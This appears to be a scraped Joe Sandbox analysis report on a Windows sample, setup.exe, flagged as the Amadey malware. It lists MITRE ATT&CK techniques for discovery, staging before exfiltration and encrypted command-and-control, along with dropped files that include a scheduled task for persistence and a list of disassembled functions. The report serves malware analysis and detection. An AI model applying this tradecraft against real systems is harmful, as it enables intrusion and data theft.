Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report setup.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe:Zone.Identifier

C:\Windows\Tasks\explorti.job

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
setup.exe

Function 002BBD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Function 002B65B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257
COMMON

Function 002B5DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Function 002B7D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Function 002E6E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Function 002ED4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198
COMMONLIBRARYCODE

Function 002B82B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Function 002E6C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Function 002E6F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Function 002ED6EF Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMON

Function 002C6AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON